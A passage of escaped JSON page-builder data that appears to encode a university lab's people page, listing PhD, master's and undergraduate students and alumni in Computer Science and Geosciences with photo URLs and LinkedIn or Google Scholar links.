82-c72\",\"parentId\":\"182-c71\",\"partialId\":182,\"styleRef\":986,\"type\":\"content\"}],\"id\":\"182-c71\",\"parentId\":\"182-c70\",\"partialId\":182,\"styleRef\":985,\"type\":\"content\"}],\"id\":\"182-c70\",\"parentId\":\"182-c2\",\"partialId\":182,\"styleRef\":984,\"type\":\"content\"}]},\"styleRef\":970,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Grads\",\"attrs\":{\"id\":\"grads\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c75\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c75\",\"index\":0,\"id\":\"182-c76\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-cropped-cropped-282038166_2492815234187345_4129762528023780269_n-e1697205710763.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1742,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c75\",\"index\":0,\"id\":\"182-c77\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sundos Al Subhi<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c75\",\"index\":2,\"id\":\"182-c78\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c75\",\"index\":3,\"id\":\"182-c79\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sundos-al-subhi-88bb97150\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c75\",\"index\":1,\"id\":\"182-c80\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c81\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c81\",\"index\":0,\"id\":\"182-c82\",\"partialId\":182,\"styleRef\":849,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/06\\/cropped-cropped-cropped-IMG_1240-scaled-1-e1697205818731.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1744,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c81\",\"index\":0,\"id\":\"182-c83\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Aaja Christie<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c81\",\"index\":2,\"id\":\"182-c84\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c81\",\"index\":3,\"id\":\"182-c85\",\"partialId\":182,\"styleRef\":901,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/aaja-christie-17573657\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c81\",\"index\":1,\"id\":\"182-c86\",\"partialId\":182,\"styleRef\":853,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c87\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c87\",\"index\":0,\"id\":\"182-c88\",\"partialId\":182,\"styleRef\":856,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-cropped-Emma-e1697205932363.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1745,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c87\",\"index\":0,\"id\":\"182-c89\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Emma McDaniel<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c87\",\"index\":2,\"id\":\"182-c90\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"styleRef\":852,\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"parentId\":\"182-c87\",\"index\":1,\"id\":\"182-c91\",\"partialId\":182,\"type\":\"content\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/emmamcdaniel\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=Cwt8OwkAAAAJ&hl=en\"},\"name\":\"socicon\\/googlescholar\"}]},\"parentId\":\"182-c87\",\"index\":1,\"id\":\"182-c92\",\"partialId\":182,\"styleRef\":857,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c93\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c93\",\"index\":0,\"id\":\"182-c94\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-cropped-anupam-e1697206626249.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1747,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c93\",\"index\":0,\"id\":\"182-c95\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Anupam Sarker<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c93\",\"index\":2,\"id\":\"182-c96\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c93\",\"index\":3,\"id\":\"182-c97\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anupam-sarker-b164b412a\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c93\",\"index\":1,\"id\":\"182-c98\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c99\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c99\",\"index\":0,\"id\":\"182-c100\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Ardavan-e1697206676649.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1748,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c99\",\"index\":0,\"id\":\"182-c101\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Ardavan Sassani\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c99\",\"index\":2,\"id\":\"182-c102\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c99\",\"index\":3,\"id\":\"182-c103\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/ardavansassani\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=9KRgkCcAAAAJ&hl=en&oi=ao\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c99\",\"index\":1,\"id\":\"182-c104\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c105\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c105\",\"index\":0,\"id\":\"182-c106\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-cropped-cropped-Jean-e1697206801281.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1750,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c105\",\"index\":0,\"id\":\"182-c107\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Jean Guo\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c105\",\"index\":2,\"id\":\"182-c108\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student<\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c105\",\"index\":3,\"id\":\"182-c109\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c110\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c110\",\"index\":0,\"id\":\"182-c111\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Basit-e1697206890221.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1752,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c110\",\"index\":0,\"id\":\"182-c112\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Basit Damilare Amuda\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c110\",\"index\":2,\"id\":\"182-c113\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c110\",\"index\":3,\"id\":\"182-c114\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"http:\\/\\/linkedin.com\\/in\\/basit-amuda-227098238\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c110\",\"index\":1,\"id\":\"182-c115\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c116\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c116\",\"index\":0,\"id\":\"182-c117\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2024\\/11\\/istockphoto-2015429231-612x612-1.jpg\",\"caption\":{\"text\":\"Vector flat illustration in black color. Avatar, user profile, person icon, profile picture. Suitable for social media profiles, icons, screensavers and as a template.\"},\"imageId\":1850,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c116\",\"index\":0,\"id\":\"182-c118\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sara Edwards<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c116\",\"index\":2,\"id\":\"182-c119\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c116\",\"index\":3,\"id\":\"182-c120\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sara-edwards-691b8331\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c116\",\"index\":1,\"id\":\"182-c121\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c122\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c122\",\"index\":0,\"id\":\"182-c123\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-cropped-cropped-cropped-Ryan-e1697207029774.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1756,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c122\",\"index\":0,\"id\":\"182-c124\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Ryan Garland<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c122\",\"index\":2,\"id\":\"182-c125\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c122\",\"index\":3,\"id\":\"182-c126\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/ryan-g-aa71a0163\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c122\",\"index\":1,\"id\":\"182-c127\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c128\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c128\",\"index\":0,\"id\":\"182-c129\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Angelique-e1697207062254.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1757,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c128\",\"index\":0,\"id\":\"182-c130\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Angelique Willis\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c128\",\"index\":2,\"id\":\"182-c131\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Master\'s Student<\\/span><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c128\",\"index\":3,\"id\":\"182-c132\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/angelique-willis\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c128\",\"index\":1,\"id\":\"182-c133\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c134\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c134\",\"index\":0,\"id\":\"182-c135\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-Screen-Shot-2023-09-26-at-9.33.41-PM-e1697207183631.png\",\"caption\":{\"text\":\"\"},\"imageId\":1758,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c134\",\"index\":0,\"id\":\"182-c136\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sikiru Bayo Abdulkareem\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c134\",\"index\":2,\"id\":\"182-c137\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Master\'s Student<\\/span><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c134\",\"index\":3,\"id\":\"182-c138\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"www.linkedin.com\\/in\\/bayonle\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c134\",\"index\":1,\"id\":\"182-c139\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c140\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c140\",\"index\":0,\"id\":\"182-c141\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-cropped-md-shah-sayem-e1697207514119.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1761,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c140\",\"index\":0,\"id\":\"182-c142\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Shah Md Shahnewaz Sayem\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c140\",\"index\":2,\"id\":\"182-c143\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c140\",\"index\":3,\"id\":\"182-c144\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/shah-md-shahnewaz-sayem-767540154\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c140\",\"index\":1,\"id\":\"182-c145\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"}],\"id\":\"182-c74\",\"parentId\":\"182-c73\",\"partialId\":182,\"styleRef\":847,\"type\":\"content\"}],\"id\":\"182-c73\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Graduates\"},\"id\":\"182-c148\",\"parentId\":\"182-c147\",\"partialId\":182,\"styleRef\":862,\"type\":\"content\"}],\"id\":\"182-c147\",\"parentId\":\"182-c146\",\"partialId\":182,\"styleRef\":861,\"type\":\"content\"}],\"id\":\"182-c146\",\"parentId\":\"182-c73\",\"partialId\":182,\"styleRef\":860,\"type\":\"content\"}]},\"styleRef\":846,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Undergrads\",\"attrs\":{\"id\":\"undergrads-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c151\",\"parentId\":\"182-c150\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c151\",\"index\":0,\"id\":\"182-c152\",\"partialId\":182,\"styleRef\":831,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-e1697207627160.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1763,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c151\",\"index\":0,\"id\":\"182-c153\",\"partialId\":182,\"styleRef\":832,\"type\":\"content\",\"props\":{\"content\":\"Joshua Quiroz<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c151\",\"index\":2,\"id\":\"182-c154\",\"partialId\":182,\"styleRef\":833,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/joshua-quiroz-315713215\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c151\",\"index\":1,\"id\":\"182-c155\",\"partialId\":182,\"styleRef\":835,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":830,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c156\",\"parentId\":\"182-c150\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c156\",\"index\":0,\"id\":\"182-c157\",\"partialId\":182,\"styleRef\":831,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-cropped-IMG_9249-e1697207848252.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1765,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c156\",\"index\":0,\"id\":\"182-c158\",\"partialId\":182,\"styleRef\":832,\"type\":\"content\",\"props\":{\"content\":\"MD Raiyan Haque<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c156\",\"index\":2,\"id\":\"182-c159\",\"partialId\":182,\"styleRef\":833,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"\\t 4:40 PM       https:\\/\\/www.linkedin.com\\/in\\/mdraiyanhaque\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c156\",\"index\":1,\"id\":\"182-c160\",\"partialId\":182,\"styleRef\":835,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":830,\"type\":\"content\"}],\"id\":\"182-c150\",\"parentId\":\"182-c149\",\"partialId\":182,\"styleRef\":829,\"type\":\"content\"}],\"id\":\"182-c149\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Undergraduates\"},\"id\":\"182-c163\",\"parentId\":\"182-c162\",\"partialId\":182,\"styleRef\":844,\"type\":\"content\"}],\"id\":\"182-c162\",\"parentId\":\"182-c161\",\"partialId\":182,\"styleRef\":843,\"type\":\"content\"}],\"id\":\"182-c161\",\"parentId\":\"182-c149\",\"partialId\":182,\"styleRef\":842,\"type\":\"content\"}]},\"styleRef\":828,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Alumni\",\"attrs\":{\"id\":\"alumni\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c166\",\"parentId\":\"182-c165\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c166\",\"index\":0,\"id\":\"182-c167\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Sarah_Akinola-scaled-2-e1697208116294.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1772,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c166\",\"index\":0,\"id\":\"182-c168\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sarah Akinola\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c166\",\"index\":2,\"id\":\"182-c169\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/akinola-sarah-035789138\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c166\",\"index\":1,\"id\":\"182-c170\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c171\",\"parentId\":\"182-c165\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c171\",\"index\":0,\"id\":\"182-c172\",\"partialId\":182,\"styleRef\":918,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Anvith-e1697208489419.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1780,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c171\",\"index\":0,\"id\":\"182-c173\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Anvith Anand\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c171\",\"index\":2,\"id\":\"182-c174\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer 